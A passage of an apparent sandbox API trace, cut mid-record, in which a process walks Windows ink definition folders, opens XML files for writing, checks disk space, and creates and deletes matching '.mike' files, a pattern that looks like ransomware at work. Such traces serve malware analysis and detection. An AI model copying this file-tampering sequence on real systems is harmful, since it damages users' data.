lpFileInformation=0x2274e38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5aadc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5aadc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ad3dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2cf0)) returned 1 [0046.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", dwFileAttributes=0x80) returned 0 [0046.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.092] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5aadc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5aadc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ad3dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2cf0)) returned 1 [0046.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.092] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike")) returned 1 [0046.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", lpFilePart=0x0) returned 0x45 [0046.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\", lpFilePart=0x0) returned 0x46 [0046.094] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5aadc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ad3dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5aadc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ad3dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="base.xml", cAlternateFileName="")) returned 1 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0046.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0046.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0046.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0046.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 0 [0046.096] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpFilePart=0x0) returned 0x48 [0046.096] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.096] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.096] CoTaskMemFree (pv=0x4fe370) [0046.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpFilePart=0x0) returned 0x48 [0046.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpFilePart=0x0) returned 0x48 [0046.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\", lpFilePart=0x0) returned 0x49 [0046.097] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.097] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.097] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0046.097] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.098] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.098] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.098] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.098] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.098] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.100] GetFileType (hFile=0x264) returned 0x1 [0046.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.100] GetFileType (hFile=0x264) returned 0x1 [0046.100] CloseHandle (hObject=0x264) returned 1 [0046.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.100] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.100] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.100] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x227aaac | out: lpFileInformation=0x227aaac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2)) returned 1 [0046.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.101] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x227adfc | out: lpFileInformation=0x227adfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2)) returned 1 [0046.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.101] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpFilePart=0x0) returned 0x54 [0046.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, 